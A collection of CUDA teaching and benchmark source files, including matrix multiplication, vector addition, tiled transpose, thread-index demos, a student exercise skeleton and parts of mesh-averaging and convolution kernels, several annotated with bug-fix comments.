    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus));
        goto Error;
    }

    // cudaDeviceSynchronize waits for the kernel to finish, and returns
    // any errors encountered during the launch.
    cudaStatus = cudaDeviceSynchronize();
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus);
        goto Error;
    }

    // Copy output vector from GPU buffer to host memory.
    cudaStatus = cudaMemcpy(Picture, d_Pout, Psize, cudaMemcpyDeviceToHost);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaMemcpy failed!");
        goto Error;
    }

Error:
    cudaFree(d_Pin);
    cudaFree(d_Pout);
    return cudaStatus;
}
21,488
// CUDA blockDim, gridDim configured as method 2 in https://blog.csdn.net/yongjiankuang/article/details/90180559
#include <bits/stdc++.h>
#include <sys/time.h>
#include <cuda.h>
#include <cuda_runtime.h>
using namespace std;

// Reference implementation:
// mat_C += mat_A (row_A x col_A) * mat_B (col_A x col_B), all row-major.
// mat_C must be zero-initialised by the caller.
void mul_cpu(int row_A, int col_A, int col_B, int* mat_A, int* mat_B, int* mat_C){
    for(int i = 0; i < row_A; i++){
        for(int j = 0; j < col_B; j++){
            for(int k = 0; k < col_A; k++){
                mat_C[i * col_B + j] += mat_A[i * col_A + k] * mat_B[k * col_B + j];
            }
        }
    }
}

// 2D-indexed kernel: one thread per element (row, col) of C.
__global__ void mul_cuda(int row_A, int col_A, int col_B, int* mat_A_CUDA, int* mat_B_CUDA, int* mat_C_CUDA){
    int row = blockIdx.y * blockDim.y + threadIdx.y;
    int col = blockIdx.x * blockDim.x + threadIdx.x;
    if(row < row_A && col < col_B && row >= 0 && col >= 0){
        for(int k = 0; k < col_A; k++){
            mat_C_CUDA[row * col_B + col] += mat_A_CUDA[row * col_A + k] * mat_B_CUDA[k * col_B + col];
        }
    }
}

// 1D-indexed kernel: flat thread `offset` owns element
// (offset / col_B, offset % col_B) of C.
// BUG FIX: the original computed row = offset / row_A; dividing by the row
// count instead of the column count is only correct when row_A == col_B and
// scrambles the output for rectangular result matrices.
__global__ void mul_cuda_dim_1D(int row_A, int col_A, int col_B, int* mat_A_CUDA, int* mat_B_CUDA, int* mat_C_CUDA){
    int offset = blockIdx.x * blockDim.x + threadIdx.x;
    int row = offset / col_B;
    int col = offset % col_B;
    if(row < row_A && col < col_B){
        for(int k = 0; k < col_A; k++){
            mat_C_CUDA[row * col_B + col] += mat_A_CUDA[row * col_A + k] * mat_B_CUDA[k * col_B + col];
        }
    }
}

// Allocates a row x col matrix; zero-filled when is_C is true, otherwise
// filled with uniform random ints in [-1000, 1000].
int* init(int row, int col, bool is_C){
    int* mat = (int *)malloc(row * col * sizeof(int ));
    random_device rd;
    mt19937 generator(rd());
    uniform_int_distribution<int> unif(-1000, 1000);
    for(int i = 0; i < row; i++){
        for(int j = 0; j < col; j++){
            mat[i * col + j] = is_C ? 0 : unif(generator);
        }
    }
    return mat;
}

int main(int argc, char* argv[]){
    /*-------------- CPU init ------------*/
    int row_A, col_A, col_B;
    int* mat_A;
    int* mat_B;
    int* mat_C;
    int* mat_A_CUDA;
    int* mat_B_CUDA;
    int* mat_C_CUDA;
    int* mat_A_CUDA_pinned;
    int* mat_B_CUDA_pinned;
    int* mat_C_CUDA_pinned;
    int* res_CPU;
    int* res_GPU;

    if(argc != 5){
        fprintf(stderr, "%s", "Usage: ./a.out $row_A $col_A $col_B $thread_count_in_block in 1Dim direction\n");
        exit(-1);
    }
    row_A = atoi(argv[1]);
    col_A = atoi(argv[2]);
    col_B = atoi(argv[3]);
    assert(row_A > 0 && col_A > 0 && col_B > 0);

    mat_A = init(row_A, col_A, false);
    mat_B = init(col_A, col_B, false);
    mat_C = init(row_A, col_B, true);
    res_CPU = init(row_A, col_B, true);

    /*-------------- CPU run -------------*/
    struct timeval start, end;
    gettimeofday(&start, 0);
    mul_cpu(row_A, col_A, col_B, mat_A, mat_B, mat_C);
    gettimeofday(&end, 0);
    int sec = end.tv_sec - start.tv_sec;
    int usec = end.tv_usec - start.tv_usec;
    int t_cpu = sec * 1000 + (usec / 1000);
    printf("CPU time (ms): %d\n", t_cpu);

    /*------------- Clear ---------------*/
    // Keep the CPU result aside and reset mat_C for the GPU runs.
    // (The original re-ran init() on res_CPU here, leaking the first buffer.)
    for(int i = 0; i < row_A; i++){
        for(int j = 0; j < col_B; j++){
            res_CPU[i * col_B + j] = mat_C[i * col_B + j];
            mat_C[i * col_B + j] = 0;
        }
    }

    /*-------------- CUDA init ------------*/
    cudaError_t ce_A, ce_B, ce_C;
    ce_A = cudaMalloc((void**) &mat_A_CUDA, row_A * col_A * sizeof(int));
    ce_B = cudaMalloc((void**) &mat_B_CUDA, col_A * col_B * sizeof(int));
    ce_C = cudaMalloc((void**) &mat_C_CUDA, row_A * col_B * sizeof(int));
    if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){
        fprintf(stderr, "%s", "cudaMalloc failed\n");
        exit(1);
    }
    ce_A = cudaMemcpy(mat_A_CUDA, mat_A, row_A * col_A * sizeof(int), cudaMemcpyHostToDevice);
    ce_B = cudaMemcpy(mat_B_CUDA, mat_B, col_A * col_B * sizeof(int), cudaMemcpyHostToDevice);
    ce_C = cudaMemcpy(mat_C_CUDA, mat_C, row_A * col_B * sizeof(int), cudaMemcpyHostToDevice);
    if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){
        fprintf(stderr, "%s", "cudaMemcpyHostToDevice failed\n");
        exit(2);
    }

    // argv[4] is rounded down to a perfect square so the same thread count
    // could also serve as a THREAD_SQRT x THREAD_SQRT 2D block (method 1,
    // kept commented out below).
    const int THREAD_SQRT = (int)sqrt(atoi(argv[4]));
    // const dim3 dimBlock(THREAD_SQRT, THREAD_SQRT);
    // const dim3 dimGrid((col_B + THREAD_SQRT - 1) / THREAD_SQRT, (row_A + THREAD_SQRT - 1) / THREAD_SQRT); // ceiling
    const dim3 dimBlock(THREAD_SQRT * THREAD_SQRT);
    const dim3 dimGrid((col_B * row_A + THREAD_SQRT * THREAD_SQRT - 1) / (THREAD_SQRT * THREAD_SQRT));

    /*-------------- CUDA run -------------*/
    gettimeofday(&start, 0);
    mul_cuda_dim_1D<<<dimGrid, dimBlock>>>(row_A, col_A, col_B, mat_A_CUDA, mat_B_CUDA, mat_C_CUDA);
    cudaError_t ce_K; // cuda error for kernel
    ce_K = cudaDeviceSynchronize();
    if(ce_K != cudaSuccess){
        fprintf(stderr, "%s", "cudaDeviceSynchronize failed\n");
        exit(3);
    }
    gettimeofday(&end, 0);
    sec = end.tv_sec - start.tv_sec;
    usec = end.tv_usec - start.tv_usec;
    int t_gpu = sec * 1000 + (usec / 1000);
    printf("GPU time (ms): %d\n", t_gpu);

    /*------- Check integrity -------------*/
    res_GPU = init(row_A, col_B, true);
    ce_C = cudaMemcpy(res_GPU, mat_C_CUDA, row_A * col_B * sizeof(int), cudaMemcpyDeviceToHost);
    if(ce_C != cudaSuccess){
        fprintf(stderr, "%s", "cudaMemcpyDeviceToHost failed\n");
        exit(4);
    }
    printf("Check integrity\n");
    for(int i = 0; i < row_A; i++){
        for(int j = 0; j < col_B; j++){
            assert(res_CPU[i * col_B + j] == res_GPU[i * col_B + j]);
        }
    }
    printf("Integrity pass!, CPU result == GPU result, all finished\n");
    printf("[row_A, col_A, col_B, block_size(thread cnt), Accelerate ratio (times)]: \n");
    printf("%d, %d, %d, %d, %f\n\n", row_A, col_A, col_B, atoi(argv[4]), (float)t_cpu / (float)t_gpu);

    /*------- Clear memory -------------*/
    cudaFree(mat_A_CUDA);
    cudaFree(mat_B_CUDA);
    cudaFree(mat_C_CUDA);

    /*-------------- CUDA init, pinned mem -*/
    // cudaMallocHost returns page-locked host memory; the kernel launch
    // below dereferences these host pointers directly, which relies on
    // unified virtual addressing (zero-copy access).
    ce_A = cudaMallocHost((void**) &mat_A_CUDA_pinned, row_A * col_A * sizeof(int));
    ce_B = cudaMallocHost((void**) &mat_B_CUDA_pinned, col_A * col_B * sizeof(int));
    ce_C = cudaMallocHost((void**) &mat_C_CUDA_pinned, row_A * col_B * sizeof(int));
    if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){
        fprintf(stderr, "%s", "cudaMallocHost failed\n");
        exit(1);
    }
    ce_A = cudaMemcpy(mat_A_CUDA_pinned, mat_A, row_A * col_A * sizeof(int), cudaMemcpyHostToDevice);
    ce_B = cudaMemcpy(mat_B_CUDA_pinned, mat_B, col_A * col_B * sizeof(int), cudaMemcpyHostToDevice);
    ce_C = cudaMemcpy(mat_C_CUDA_pinned, mat_C, row_A * col_B * sizeof(int), cudaMemcpyHostToDevice);
    if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){
        fprintf(stderr, "%s", "cudaMemcpyHostToDevice, pinned memory failed\n");
        exit(2);
    }

    /*-------------- CUDA run, pinned mem -*/
    gettimeofday(&start, 0);
    mul_cuda_dim_1D<<<dimGrid, dimBlock>>>(row_A, col_A, col_B, mat_A_CUDA_pinned, mat_B_CUDA_pinned, mat_C_CUDA_pinned);
    ce_K = cudaDeviceSynchronize();
    if(ce_K != cudaSuccess){
        fprintf(stderr, "%s", "cudaDeviceSynchronize, pinned memory failed\n");
        exit(3);
    }
    gettimeofday(&end, 0);
    sec = end.tv_sec - start.tv_sec;
    usec = end.tv_usec - start.tv_usec;
    t_gpu = sec * 1000 + (usec / 1000);
    printf("GPU time, pinned memory (ms): %d\n", t_gpu);

    /*------- Check integrity, pinned mem -*/
    // Reuse res_GPU from the first check (the original allocated a second
    // buffer here and leaked the first); every element is overwritten below.
    ce_C = cudaMemcpy(res_GPU, mat_C_CUDA_pinned, row_A * col_B * sizeof(int), cudaMemcpyDeviceToHost);
    if(ce_C != cudaSuccess){
        fprintf(stderr, "%s", "cudaMemcpyDeviceToHost, pinned memory failed\n");
        exit(4);
    }
    printf("Check integrity, pinned memory\n");
    for(int i = 0; i < row_A; i++){
        for(int j = 0; j < col_B; j++){
            assert(res_CPU[i * col_B + j] == res_GPU[i * col_B + j]);
        }
    }
    printf("Integrity pass, pinned memory!, CPU result == GPU result, all finished\n");
    printf("[row_A, col_A, col_B, block_size(thread cnt), Accelerate ratio (times)]: \n");
    printf("%d, %d, %d, %d, %f\n\n", row_A, col_A, col_B, atoi(argv[4]), (float)t_cpu / (float)t_gpu);

    /*------- Clear memory -------------*/
    free(mat_A);
    free(mat_B);
    free(mat_C);
    cudaFreeHost(mat_A_CUDA_pinned);
    cudaFreeHost(mat_B_CUDA_pinned);
    cudaFreeHost(mat_C_CUDA_pinned);
    free(res_CPU);
    free(res_GPU);
    return 0;
}
21,489
#include "includes.h"

/* Element-wise C = A + B with a 2x unrolled grid: each block covers
 * 2 * blockDim.x output elements, and reads are shifted by `offset`
 * (used to study misaligned-access behaviour).  Both halves are
 * bounds-checked against n. */
__global__ void readOffsetUnroll2(float *A, float *B, float *C, const int n, int offset)
{
    const unsigned int dst = 2u * blockIdx.x * blockDim.x + threadIdx.x;
    const unsigned int src = dst + offset;
    const unsigned int half = blockDim.x;

    if (src < n)
        C[dst] = A[src] + B[src];

    if (src + half < n)
        C[dst + half] = A[src + half] + B[src + half];
}
21,490
#include "includes.h"

/* Naive square matrix product: matP = mat1 * mat2, all dim x dim and
 * row-major.  One thread per output element; x indexes the column, y the
 * row. */
__global__ void matmulKernel(float* mat1, float* mat2, float* matP, int dim)
{
    const int col = blockIdx.x * blockDim.x + threadIdx.x;
    const int row = blockIdx.y * blockDim.y + threadIdx.y;

    if (col >= dim || row >= dim)
        return;

    float acc = 0.f;
    for (int k = 0; k < dim; k++)
        acc += mat1[row * dim + k] * mat2[k * dim + col];

    matP[row * dim + col] = acc;
}
21,491
#include "includes.h"

/* Element-wise c = a + b over n*m elements.
 *
 * BUG FIX: the original index, blockIdx.x + blockIdx.y * blockDim.y, ignored
 * threadIdx entirely — every thread of a block computed the SAME index, so at
 * most gridDim.x * gridDim.y elements were ever written.  Use the standard
 * flat global index for a 2D grid of 2D blocks (reduces to the usual 1D
 * formula when the y dimensions are 1). */
__global__ void suma(int *a, int *b, int *c, int n, int m)
{
    int x = blockIdx.x * blockDim.x + threadIdx.x;
    int y = blockIdx.y * blockDim.y + threadIdx.y;
    int index = y * (gridDim.x * blockDim.x) + x;
    if (index < n * m) {
        c[index] = a[index] + b[index];
    }
}
21,492
#include <iostream>
#include <stdio.h>
#include <sys/time.h>
#include <cuda.h>
using namespace std;

// Side of the shared-memory tile used by the transpose kernel.
#define SH_DIM 32

#define CUDA_CHECK_RETURN(value) {\
    cudaError_t _m_cudaStat = value;\
    if (_m_cudaStat != cudaSuccess) {\
        fprintf(stderr, "Error %s at line %d in file %s\n", cudaGetErrorString(_m_cudaStat), __LINE__, __FILE__);\
        exit(1);\
    }}

// Tiled matrix transpose, B = A^T.
// The extra column (+1) in the shared tile avoids shared-memory bank
// conflicts on the transposed read.
// Preconditions (validated in main): square thread blocks with side
// <= SH_DIM, and the matrix side divisible by the block side.
__global__ void transpose(float *A, float *B)
{
    __shared__ float buffer_s[SH_DIM][SH_DIM + 1];
    int i = threadIdx.x + blockIdx.x * blockDim.x;
    int j = threadIdx.y + blockIdx.y * blockDim.y;
    int N = blockDim.x * gridDim.x;
    // Stage this block's tile of A.
    buffer_s[threadIdx.y][threadIdx.x] = A[i + j * N];
    __syncthreads();
    // Swap the block coordinates and read the tile transposed.
    i = threadIdx.x + blockIdx.y * blockDim.x;
    j = threadIdx.y + blockIdx.x * blockDim.y;
    B[i + j * N] = buffer_s[threadIdx.x][threadIdx.y];
}

// A[k] = k; B zeroed.
void InitMatrix(float *A, float *B, int size)
{
    for (int i = 0; i < size; i++)
        for (int j = 0; j < size; j++) {
            int k = size * i + j;
            A[k] = k;
            B[k] = 0;
        }
}

void printMatrix(float *C, int size)
{
    for (int i = 0; i < size * size; i++)
        cout << C[i] << "\t";
    cout << endl;
}

// Wall-clock time in seconds.
double wtime()
{
    struct timeval t;
    gettimeofday(&t, NULL);
    return (double)t.tv_sec + (double)t.tv_usec * 1E-6;
}

int main(int argc, char* argv[])
{
    if (argc != 4) {
        cout << "launch parametrs: [matrix size] [threads_x] [threads_y]" << endl;
        return 1;
    }
    int size = atoi(argv[1]);
    int threads_per_block_x = atoi(argv[2]);
    int threads_per_block_y = atoi(argv[3]);

    // The kernel stages each block in a SH_DIM x SH_DIM shared tile and reads
    // it back transposed, so blocks must be square, no larger than SH_DIM,
    // and must tile the matrix exactly.  The original version silently
    // overflowed the shared tile / produced garbage for other inputs.
    if (threads_per_block_x <= 0 || threads_per_block_x > SH_DIM ||
        threads_per_block_x != threads_per_block_y) {
        cout << "threads_x must equal threads_y and lie in [1, " << SH_DIM << "]" << endl;
        return 1;
    }
    if (size <= 0 || size % threads_per_block_x != 0) {
        cout << "matrix size must be a positive multiple of threads_x" << endl;
        return 1;
    }

    srand(time(NULL));
    float *A = new float[size * size];
    float *B = new float[size * size];
    float *dev_A, *dev_B;
    CUDA_CHECK_RETURN(cudaMalloc((void**)&dev_A, size * size * sizeof(float)));
    CUDA_CHECK_RETURN(cudaMalloc((void**)&dev_B, size * size * sizeof(float)));
    InitMatrix(A, B, size);

    dim3 threads(threads_per_block_x, threads_per_block_y);
    dim3 blocks(size / threads.x, size / threads.y);
    CUDA_CHECK_RETURN(cudaMemcpy(dev_A, A, size * size * sizeof(float), cudaMemcpyHostToDevice));
    CUDA_CHECK_RETURN(cudaMemcpy(dev_B, B, size * size * sizeof(float), cudaMemcpyHostToDevice));

    // Time the kernel with CUDA events.
    float elapsedTime;
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);

    cudaEventRecord(start, 0);
    transpose <<< blocks, threads >>> (dev_A, dev_B);
    cudaEventRecord(stop, 0);
    cudaEventSynchronize(stop);
    CUDA_CHECK_RETURN(cudaDeviceSynchronize());
    CUDA_CHECK_RETURN(cudaGetLastError());
    cudaEventElapsedTime(&elapsedTime, start, stop);

    CUDA_CHECK_RETURN(cudaMemcpy(B, dev_B, size * size * sizeof(float), cudaMemcpyDeviceToHost));
    //printMatrix(B, size);
    cout << "time: " << elapsedTime << " ms" << endl;

    delete [] A;
    delete [] B;
    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    cudaFree(dev_A);
    cudaFree(dev_B);
    return 0;
}
21,493
#include <iostream>
#include <cuda_runtime.h>

// Empty kernel: its only purpose is to exercise a kernel launch.
__global__ void kernel(void)
{
}

int main()
{
    // Fire off a single-thread launch, then greet from the host.
    kernel<<<1, 1>>>();
    std::cout << "Hello World!" << std::endl;
    return 0;
}
21,494
#include "includes.h"

/* Square matrix product c = a * b (N x N, row-major; N comes from
 * includes.h).  One thread per output element: x selects the column,
 * y the row. */
__global__ void Matriz_GPU_Mult(int *a, int *b, int *c)
{
    const int col = blockIdx.x * blockDim.x + threadIdx.x;
    const int row = blockIdx.y * blockDim.y + threadIdx.y;

    if (col >= N || row >= N)
        return;

    int acc = 0;
    for (int k = 0; k < N; k++)
        acc += a[row * N + k] * b[k * N + col];

    c[row * N + col] = acc;
}
21,495
#include <algorithm>
#include <cassert>
#include <cstdlib>
#include <iostream>
#include <iterator>
#include <vector>
#include <chrono>
#include <random>

using namespace std;

// Abort with the CUDA error string if a runtime call fails.  Kernel launch
// configuration errors are surfaced via cudaGetLastError() after the launch.
#define CUDA_CHECK(call)                                                   \
    do {                                                                   \
        cudaError_t err_ = (call);                                         \
        if (err_ != cudaSuccess) {                                         \
            cerr << "CUDA error: " << cudaGetErrorString(err_) << '\n';    \
            exit(EXIT_FAILURE);                                            \
        }                                                                  \
    } while (0)

//=========================== kernel ========================================
// c[k] = a[k] + b[k] for k < N.  Written with 2D indexing; under the 1D
// launch below the y terms are zero and k reduces to the usual flat index.
__global__ void vectorAdd(int *a, int *b, int *c, int N)
{
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    int j = blockIdx.y * blockDim.y + threadIdx.y;
    int k = j * gridDim.x * blockDim.x + i;
    if (k < N)
        c[k] = a[k] + b[k];
}

auto get_time() { return chrono::high_resolution_clock::now(); }

//=========================== fuction main ===================================================
int main()
{
    constexpr int N = 1000 << 16;   // 65,536,000 elements
    size_t bytes = sizeof(int) * N;

    int NUM_THREADS = 1 << 10;                              // 1024 threads per block
    int NUM_BLOCKS = (N + NUM_THREADS - 1) / NUM_THREADS;   // ceiling division

    // Pinned host buffers (fast async-capable transfers).
    int *h_a, *h_b, *h_c;
    CUDA_CHECK(cudaMallocHost(&h_a, bytes));
    CUDA_CHECK(cudaMallocHost(&h_b, bytes));
    CUDA_CHECK(cudaMallocHost(&h_c, bytes));

    for (int i = 0; i < N; i++)   // initialisation les vacteurs a ,b
    {
        h_a[i] = rand() % 100;
        h_b[i] = rand() % 100;
    }

    // GPU buffers.
    int *d_a, *d_b, *d_c;
    CUDA_CHECK(cudaMalloc(&d_a, bytes));
    CUDA_CHECK(cudaMalloc(&d_b, bytes));
    CUDA_CHECK(cudaMalloc(&d_c, bytes));

    // CPU ---> GPU
    CUDA_CHECK(cudaMemcpy(d_a, h_a, bytes, cudaMemcpyHostToDevice));
    CUDA_CHECK(cudaMemcpy(d_b, h_b, bytes, cudaMemcpyHostToDevice));

    auto start = get_time();
    vectorAdd<<<NUM_BLOCKS, NUM_THREADS>>>(d_a, d_b, d_c, N);
    CUDA_CHECK(cudaGetLastError());   // fix: the original never checked the launch

    // GPU ---> CPU (this blocking copy also synchronises with the kernel)
    CUDA_CHECK(cudaMemcpy(h_c, d_c, bytes, cudaMemcpyDeviceToHost));
    auto finish = get_time();

    auto duration = chrono::duration_cast<std::chrono::milliseconds>(finish - start);
    cout << "temps écoulé en kernel = " << duration.count() << " ms\n";

    // Verify against the host computation.
    for (int i = 0; i < N; i++) {
        assert(h_c[i] == h_a[i] + h_b[i]);
    }

    cudaFreeHost(h_a);
    cudaFreeHost(h_b);
    cudaFreeHost(h_c);
    cudaFree(d_a);
    cudaFree(d_b);
    cudaFree(d_c);

    cout << "terminé avec succès" << endl;
    return 0;
}
21,496
#include <stdio.h>

#define NB_COLS 4000 // Number of columns of the matrix.
#define NB_ROWS 4000 // Number of rows of the matrix.

void matrixInit(int *mat); // Fills a matrix with mat[l][c] = l + c.
void checkRes(int *mat);   // Verifies the results.

// CUDA kernel.
// NOTE: this is an exercise skeleton — the body is intentionally left as a
// TODO for the student.  checkRes() expects c = a + b element-wise.
__global__ void MatrixAdd(int *a, int *b, int *c)
{
    // TODO
    // indices: compute the global index using
    //   blockIdx.x
    //   blockDim.x
    //   threadIdx.x
}

// Host code
int main(void)
{
    int *a, *b, *c;             // Host matrices A, B and C
    int *dev_a, *dev_b, *dev_c; // Device matrices A, B and C
    int nbElements = NB_COLS * NB_ROWS;
    int matrixSize = nbElements * sizeof(int);
    int threadsPerBlock = 256;
    // TODO compute the number of blocks needed
    // (still 0 here: the program cannot succeed until it is filled in).
    int blocksPerGrid = 0;

    // Host matrix allocation.
    a = (int *)malloc(matrixSize);
    if (a == NULL) {
        printf("Allocation failure\n");
        abort();
    }
    b = (int *)malloc(matrixSize);
    if (b == NULL) {
        printf("Allocation failure\n");
        abort();
    }
    c = (int *)malloc(matrixSize);
    if (c == NULL) {
        printf("Allocation failure\n");
        abort();
    }

    // Device matrix allocation.
    cudaMalloc((void **)&dev_a, matrixSize);
    cudaMalloc((void **)&dev_b, matrixSize);
    cudaMalloc((void **)&dev_c, matrixSize);
    auto cudaStatus = cudaGetLastError();
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "addKernel memory failed: %s\n", cudaGetErrorString(cudaStatus));
        return -1;
    }

    // Initialise matrices A and B.
    matrixInit(a);
    matrixInit(b);

    // Copy matrices A and B to the GPU.
    // TODO transfer the data of a and b to the GPU
    //      using cudaMemcpy and cudaMemcpyHostToDevice

    // Kernel launch.
    // TODO launch the kernel with the appropriate number of blocks and
    //      number of threads per block
    cudaStatus = cudaGetLastError();
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus));
        return -1;
    }

    // Copy matrix C from the GPU back to the host.
    cudaMemcpy(c, dev_c, matrixSize, cudaMemcpyDeviceToHost);
    checkRes(c);

    // Release host and device matrices.
    free(a);
    free(b);
    free(c);
    cudaFree(dev_a);
    cudaFree(dev_b);
    cudaFree(dev_c);
    getchar();
    return 0;
}

/////////////////////////////////////////////////////////////////////////////////////////////
//
// Utility functions. Nothing to modify here.
//
/////////////////////////////////////////////////////////////////////////////////////////////

// Fills mat (row-major) with mat[l][c] = l + c.
void matrixInit(int *mat)
{
    int l, c;
    for (l = 0; l < NB_ROWS; l++)
        for (c = 0; c < NB_COLS; c++)
            mat[l * NB_COLS + c] = l + c;
}

// Checks that every element equals 2 * (row + col), i.e. the element-wise
// sum of two matrices produced by matrixInit; exits on the first mismatch.
void checkRes(int *mat)
{
    int l, c;
    for (l = 0; l < NB_ROWS; l++)
        for (c = 0; c < NB_COLS; c++)
            if (mat[l * NB_COLS + c] != 2 * (c + l)) {
                printf("Erreur de calcul sur l'element %d:%d :\n", l, c);
                printf(" - Valeur calculee : %d\n", mat[l * NB_COLS + c]);
                printf(" - Valeur attendue : %d\n", 2 * (c + l));
                exit(0);
            }
    printf("LEVEL 1: Done\n");
    printf("Good job!\n");
}
21,497
#include "includes.h"

/* For each vertex this thread handles, replaces TD[v] with the average of
 * D over the vertex itself and its neighbours (x, y, z components; the w
 * component is carried through unchanged from D[v]).
 *
 * Topology inputs: NEIGHBOR holds concatenated adjacency lists; the list for
 * vertex v starts at NBOFFSETS[v] and has nNeighbors[v] entries.
 *
 * Work distribution: each block owns a contiguous range of
 * 4 * blockDim.x vertices; thread t processes the 4 vertices
 * vidxb + k*BLOCK_SIZE_AVGG (k = 0..3) and caches their D values in
 * SI[4t .. 4t+3].  NOTE(review): the SI indexing assumes
 * blockDim.x == BLOCK_SIZE_AVGG — confirm against the launch configuration.
 */
__global__ void GradientAverageKernel(float4 *D, float4 *TD, unsigned int *NEIGHBOR, unsigned int *NBOFFSETS, unsigned int *nNeighbors, unsigned int nVertices)
{
    int n,N;
    int offset,soffset;
    // since we are using multiple threads per blocks as well as multiple blocks
    int vidxb = 4*(blockIdx.x * blockDim.x) + threadIdx.x;
    //int basevert = 4*(blockIdx.x * blockDim.x);
    int vidx; //,tab;
    float4 nbd,td;
    // create a cache for 4 elements per block (4*BLOCK_SIZE elements)
    __shared__ float4 SI[4*BLOCK_SIZE_AVGG];
    int bidx = 4*threadIdx.x;
    // Cache this thread's 4 vertices (strided by BLOCK_SIZE_AVGG) into SI.
    // this means we have 128 neighboring vertices cached
    for (vidx=vidxb; vidx<vidxb+4*BLOCK_SIZE_AVGG; vidx+=BLOCK_SIZE_AVGG) {
        if (vidx < nVertices) {
            SI[bidx] = D[vidx];
            bidx++;
        }
    }
    __syncthreads();
    bidx = 4*threadIdx.x;
    // Second pass over the same 4 vertices: accumulate neighbour values and
    // average.  td starts from the vertex's own cached value.
    // preload the current BLOCK_SIZE vertices
    for (vidx=vidxb; vidx<vidxb+4*BLOCK_SIZE_AVGG; vidx+=BLOCK_SIZE_AVGG) {
        if (vidx < nVertices) {
            offset = NBOFFSETS[ vidx ];
            N = nNeighbors[ vidx ];
            td = SI[bidx++];
            for (n = 0; n < N; n++) {
                soffset = NEIGHBOR[offset+n];
                /* tab = soffset - basevert;
                   if(tab > 0 && tab < 4*BLOCK_SIZE)
                       nbd = SI[tab];
                   else */
                // Neighbours are fetched straight from global memory; the
                // commented-out code above was an attempt to reuse the SI
                // cache for in-block neighbours.
                nbd = D[soffset];
                td.x += nbd.x;
                td.y += nbd.y;
                td.z += nbd.z;
            }
            // Divide by N+1: the vertex itself plus its N neighbours.
            td.x /= (float)(N+1);
            td.y /= (float)(N+1);
            td.z /= (float)(N+1);
            TD[vidx] = td;
        }
    }
}
21,498
#include<stdio.h>

#define ARRAY_SIZE 16

/* For every thread, prints its local id, its flattened global id, the
 * block/grid coordinates the id was derived from, and the data element it
 * owns.  Written for a 2D grid of 1D blocks covering exactly ARRAY_SIZE
 * threads. */
__global__ void print_index_and_data(int * data)
{
    int tid = threadIdx.x;
    int within_row = blockIdx.x * blockDim.x;
    int row_base = blockDim.x * gridDim.x * blockIdx.y;
    int gid = tid + within_row + row_base;

    printf("%d\t\t%d\t\t%d\t\t%d\t\t%d\t\t%d\t\t%d\t%d\n",
           tid, gid, blockIdx.x, blockIdx.y, blockDim.x, blockDim.y,
           gridDim.x, data[gid]);
}

int main()
{
    const int bytes = sizeof(int) * ARRAY_SIZE;
    int h_data[ARRAY_SIZE];

    /* Fill the host array with 0..ARRAY_SIZE-1 and echo it. */
    for (int i = 0; i < ARRAY_SIZE; i++) {
        h_data[i] = i;
        printf("%d ", h_data[i]);
    }
    printf("\n\n");

    /* 2x2 grid of 4-thread blocks: 16 threads, one per element. */
    dim3 block(4);
    dim3 grid(2, 2);

    int *d_data;
    cudaMalloc((void**)&d_data, bytes);
    cudaMemcpy(d_data, h_data, bytes, cudaMemcpyHostToDevice);

    printf("threadIdx.x\tgid\tblockIdx.x\tblockIdx.y\tblockDim.x\tblockDim.y\tgridDim.x\tdata\n");
    print_index_and_data<<<grid, block>>>(d_data);
    cudaDeviceSynchronize();

    cudaDeviceReset();
    return 0;
}
21,499
#include <cuda.h>
#include <stdio.h>

/* Each thread adds 2 * (blockIdx.x + threadIdx.x) to its own slot of the
 * global array (which main() zero-initialises before the launch). */
__global__ void simpleKernel(int *data)
{
    // this adds a value to a variable stored in global memory
    data[threadIdx.x] += 2 * (blockIdx.x + threadIdx.x);
}

int main()
{
    const int numElems = 4;
    int hostArray[numElems], *devArray;

    // allocate memory on the device; zero out all entries in this device array
    cudaMalloc((void **)&devArray, sizeof(int) * numElems);
    cudaMemset(devArray, 0, numElems * sizeof(int));

    // invoke GPU kernel, with one block that has four threads
    simpleKernel<<<1, numElems>>>(devArray);

    // bring the result back from the GPU into the hostArray.
    // Fix: pass the array itself (which decays to int*) rather than
    // &hostArray, whose type is int(*)[4] — same address, wrong type.
    cudaMemcpy(hostArray, devArray, sizeof(int) * numElems, cudaMemcpyDeviceToHost);

    // print out the result to confirm that things are looking good
    printf("Values stored in hostArray: \n");
    for (int i = 0; i < numElems; i++)
        printf("%d\n", hostArray[i]);

    // release the memory allocated on the GPU
    cudaFree(devArray);
    return 0;
}
21,500
#include "includes.h"

/* Tiled forward convolution with left/upper zero padding.
 *
 * Each thread block computes one 32x32 tile of one (image, filter) output
 * plane; blockIdx.y encodes (image index, tile row) and blockIdx.x encodes
 * (filter index, tile column).  Per input channel g the block stages a
 * (32 + MAX_FILETER_SIZE - 1)^2 halo tile of the image and the filter's
 * g-th channel into shared memory, accumulates the filter_size x
 * filter_size dot product into a register, then adds the filter bias and
 * scales by 1 / sigma^2 (fast-math division) before the single global store.
 *
 * NOTE(review): the hard-coded 32s imply blockDim == (32, 32) and
 * input_size a multiple of 32 — confirm at the launch site.  Layouts
 * implied by the indexing: input is [image][channel][row][col], filters are
 * [filter][channel][row][col], feature_map is [image][filter][row][col].
 */
__global__ void convolution_forward_kernel(float *input, float *filters, float *feature_map, float *hbias, int input_size, int channel_num, int feature_map_size, int filter_size, int filter_num, int lu_padding, float sigma){
    /* Image tile with halo, and the current filter channel. */
    __shared__ float shImg[32+MAX_FILETER_SIZE-1][32+MAX_FILETER_SIZE-1];
    __shared__ float shFilter[MAX_FILETER_SIZE][MAX_FILETER_SIZE];

    /* Decode image/filter indices and the tile-local output coordinates. */
    int imgIdx = blockIdx.y / (input_size / 32);
